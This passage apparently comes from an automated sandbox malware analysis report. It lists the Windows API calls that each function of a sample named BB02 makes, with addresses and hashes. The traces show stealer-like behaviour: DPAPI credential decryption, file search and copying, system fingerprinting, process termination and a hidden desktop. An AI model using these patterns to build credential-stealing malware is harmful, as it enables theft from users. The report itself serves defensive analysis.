lstrcpy.KERNEL32(00000000,?), ref: 024F1C49
lstrcpy.KERNEL32(00000000,?), ref: 024F1C72
StrCmpCA.SHLWAPI(?,00638938), ref: 024F1C9E
lstrcpy.KERNEL32(00000000,?), ref: 024F1CDF
lstrcpy.KERNEL32(00000000,?), ref: 024F1D08
lstrcpy.KERNEL32(00000000,?), ref: 024F1D3C
lstrcpy.KERNEL32(00000000,?), ref: 024F1D8B
lstrcpy.KERNEL32(00000000,?), ref: 024F1DBF
lstrcpy.KERNEL32(00000000,?), ref: 024F1DFA
FindNextFileA.KERNEL32(00000000,?), ref: 024F1E22
FindClose.KERNEL32(00000000), ref: 024F1E31

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
String ID:
API String ID: 1346933759-0
Opcode ID: 305c3d06416b015528e76a0012c4fbf1ceb80ae9780ebd3fdd7e611fdf6c72f7
Instruction ID: 8d66ed4215d76d3087fc4f4daa4767ccea6a887cf0da3b0eb09a8f6c8743320b
Opcode Fuzzy Hash: 305c3d06416b015528e76a0012c4fbf1ceb80ae9780ebd3fdd7e611fdf6c72f7
Instruction Fuzzy Hash: 6F124271600346DFEB24EF35DC88A6B77EAAF84305F04492EE99A97650EB74D804CF91

Function 02506627 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02506680
GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02506699
GetProcAddress.KERNEL32(006390E0,00638A64), ref: 025066B1
GetProcAddress.KERNEL32(006390E0,00638A50), ref: 025066C9
GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 025066E2
GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 025066FA
GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02506712
GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0250672B
GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02506743
GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0250675B
GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02506774
GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0250678C
GetProcAddress.KERNEL32(006390E0,006388B0), ref: 025067A4
GetProcAddress.KERNEL32(006390E0,00638D98), ref: 025067BD
GetProcAddress.KERNEL32(006390E0,00638A24), ref: 025067D5
GetProcAddress.KERNEL32(006390E0,00638C18), ref: 025067ED
GetProcAddress.KERNEL32(006390E0,00638E34), ref: 02506806
GetProcAddress.KERNEL32(006390E0,006388BC), ref: 0250681E
GetProcAddress.KERNEL32(006390E0,0063892C), ref: 02506836
GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 0250684F
LoadLibraryA.KERNEL32(00638D50,?,?,?,02501E4A), ref: 02506860
LoadLibraryA.KERNEL32(0063897C,?,?,?,02501E4A), ref: 02506872
LoadLibraryA.KERNEL32(00638904,?,?,?,02501E4A), ref: 02506884
LoadLibraryA.KERNEL32(006389DC,?,?,?,02501E4A), ref: 02506895
LoadLibraryA.KERNEL32(00638B28,?,?,?,02501E4A), ref: 025068A7
GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 025068C4
GetProcAddress.KERNEL32(00639020,00638C24), ref: 025068E0
GetProcAddress.KERNEL32(00639020,006389CC), ref: 025068F8
GetProcAddress.KERNEL32(00639114,00638B94), ref: 02506914
GetProcAddress.KERNEL32(00638FD4,00638928), ref: 02506930
GetProcAddress.KERNEL32(00639004,00638C14), ref: 0250694C
GetProcAddress.KERNEL32(00639004,00435864), ref: 02506963

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: d381c2d1eccc70dc2ebe1dbee36ef9c26239863c407a49dd0636d0240eaef995
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: 8EA16EB9A117009FD758DF65EE88A663BBBF789344300A51DF94683360DBB4A900DFB0

Function 024FCF47 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 024FCF63
FindFirstFileA.KERNEL32(?,?), ref: 024FCF7A
lstrcat.KERNEL32(?,?), ref: 024FCFC6
StrCmpCA.SHLWAPI(?,00431D70), ref: 024FCFD8
StrCmpCA.SHLWAPI(?,00431D74), ref: 024FCFF2
wsprintfA.USER32 ref: 024FD017
PathMatchSpecA.SHLWAPI(?,00638D64), ref: 024FD049
CoInitialize.OLE32(00000000), ref: 024FD055

Part of subcall function 024FCE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 024FCE6D
Part of subcall function 024FCE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 024FCEAD
Part of subcall function 024FCE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 024FCF30

CoUninitialize.COMBASE ref: 024FD070
lstrcat.KERNEL32(?,?), ref: 024FD095
lstrlen.KERNEL32(?), ref: 024FD0A2
StrCmpCA.SHLWAPI(?,0042D01C), ref: 024FD0BC
wsprintfA.USER32 ref: 024FD0E4
wsprintfA.USER32 ref: 024FD103
PathMatchSpecA.SHLWAPI(?,?), ref: 024FD117
wsprintfA.USER32 ref: 024FD13F
CopyFileA.KERNEL32(?,?,00000001), ref: 024FD158
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 024FD177
GetFileSizeEx.KERNEL32(00000000,?), ref: 024FD18F
CloseHandle.KERNEL32(00000000), ref: 024FD19A
CloseHandle.KERNEL32(00000000), ref: 024FD1A6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024FD1BB
lstrcpy.KERNEL32(00000000,?), ref: 024FD1FB
FindNextFileA.KERNEL32(?,?), ref: 024FD2F4
FindClose.KERNEL32(?), ref: 024FD306

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
String ID:
API String ID: 3860919712-0
Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction ID: c92073f2f12bf2064e1f2beecdda1525c2a5772415b787e77159b634723bd54e
Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction Fuzzy Hash: 09C162719002199FDB54DF64DC48FEE777AAF88305F00459AFA09A7290DB74AA84CFA0

Function 00409876 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 174stringsleepprocessCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(?), ref: 00409888
memset.MSVCRT ref: 004098A6
lstrcatA.KERNEL32(?,?), ref: 004098BB
lstrcatA.KERNEL32(?,?), ref: 004098CD
lstrcatA.KERNEL32(?,00435128), ref: 004098DD
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
lstrcpy.KERNEL32(00000000,?), ref: 00409950
StrStrA.SHLWAPI(?,00A3E610), ref: 00409965
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
lstrlenA.KERNEL32(?), ref: 00409996
wsprintfA.USER32 ref: 004099A6
lstrcpy.KERNEL32(?,?), ref: 004099BD
memset.MSVCRT ref: 004099D3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000), ref: 00409A32
Sleep.KERNEL32(00001388), ref: 00409A41
CloseDesktop.USER32(?), ref: 00409A81

Strings

D, xrefs: 004099EA
%s%s, xrefs: 004099A0

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDesktoplstrcpymemset$CloseFolderPathProcessSleeplstrcpynlstrlenwsprintf
String ID: %s%s$D
API String ID: 3850938096-433275411
Opcode ID: 3b7bcb9baf172843c3db97fc7ed1e7ea6609f5e64af5040f656d43d3bd13194b
Instruction ID: a7c648236efd38c04947cc9f358bb87a81258cd583e53001e760b02128fb778b
Opcode Fuzzy Hash: 3b7bcb9baf172843c3db97fc7ed1e7ea6609f5e64af5040f656d43d3bd13194b
Instruction Fuzzy Hash: 606173B1204340AFD720EF64DC45F9B77E9AF88704F00492EF649972E1DBB49904CBA6

Function 024E1820 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1880
lstrcpy.KERNEL32(00000000,00000000), ref: 024E18D3
lstrcat.KERNEL32(00000000), ref: 024E18DD
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1909
lstrcpy.KERNEL32(00000000,?), ref: 024E1A5A
lstrcat.KERNEL32(00000000,00000000), ref: 024E1A65

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction ID: 7752301dbe6138ab1977fbf96b2417da4e52dc8b95732939f699bc14f7143f1e
Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction Fuzzy Hash: 408155719002559FEF21EF75CC84AAE7BBAAF4430AF04012AEC0AA7251DB74DD01DFA0

Function 004246C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
Process32First.KERNEL32(00000000,00000128), ref: 004246E9
Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
StrCmpCA.SHLWAPI(?,?), ref: 0042470D
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
CloseHandle.KERNEL32(00000000), ref: 00424738
Process32Next.KERNEL32(00000000,00000128), ref: 00424746
CloseHandle.KERNEL32(00000000), ref: 00424751

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4

Function 02502F67 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02507477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02507495

GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02502FA2
LocalAlloc.KERNEL32(00000040,00000000), ref: 02502FB4
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02502FC1
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02502FF3
LocalFree.KERNEL32(00000000), ref: 025031D1

Strings

/ , xrefs: 02503006

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction ID: 2d5536ae9909cf9ee1057697b69871e11e1ba1e55f3c7e46378c26f57f7443bb
Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction Fuzzy Hash: CFB1F971900205DFD715CF54CD88BA5BBF2BB88329F29C1A9D409AB2E1D7769C82CF94

Function 024EEFF7 Relevance: 9.1, APIs: 6, Instructions: 96stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024EF022
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 024EF03D
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 024EF045
memcpy.MSVCRT(?,?,?), ref: 024EF0B8
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 024EF0EE
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 024EF110

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction ID: dbc2048f76303ec6b07b1e381cf706628b83296b9e13e972cc6e32966256bf7e
Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction Fuzzy Hash: 6931C175B00219ABDB108B98EC45BEFB779EF84705F04417AFA09E3240DBB49A04CBE5

Function 02502E17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02502E49
RtlAllocateHeap.NTDLL(00000000), ref: 02502E50
GetTimeZoneInformation.KERNEL32(?), ref: 02502E5F
wsprintfA.USER32 ref: 02502E8A

Strings

wwww, xrefs: 02502E70

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 3317088062-671953474
Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction ID: 613eb8de0aa0ef23a830036d220cde7ae11a9466a5542a1737eb30be6b2c9418
Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction Fuzzy Hash: 4F01F771A04604ABCB188F58DC4AB6ABB6AE784720F10436AFD16D72C0D7B419008AE5

Function 02507E31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02508699
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 025086AE
UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 025086B9
GetCurrentProcess.KERNEL32(C0000409), ref: 025086D5
TerminateProcess.KERNEL32(00000000), ref: 025086DC

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction ID: 92053736ec96f44ef7394a17bf4dff7b40231d681840d72d68df7af6a8b2032f
Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction Fuzzy Hash: 5421E2B59003069FC760DF24FD84A49BBB4FB28304F50602DF41887BA2EB7069858F5D

Function 00407690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
HeapAlloc.KERNEL32(00000000), ref: 004076A5
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
LocalFree.KERNEL32(?), ref: 004076F7

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4

Function 00424090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocProcess
String ID:
API String ID: 3939037734-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4

Function 025042F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 02504314
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 02504323
RtlAllocateHeap.NTDLL(00000000), ref: 0250432A
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 0250435A

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: e6eccb6c20fdfa1288d7b422d16d6b22a2023ce3e91948a5f33526518ed8e99e
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: 3B011A70600205ABDB149FA5EC89BAABBADEF85315F105159BE0987240DB71E9808BA4

Function 00409BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
memcpy.MSVCRT(00000000,?), ref: 00409C2A
LocalFree.KERNEL32(?), ref: 00409C37

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
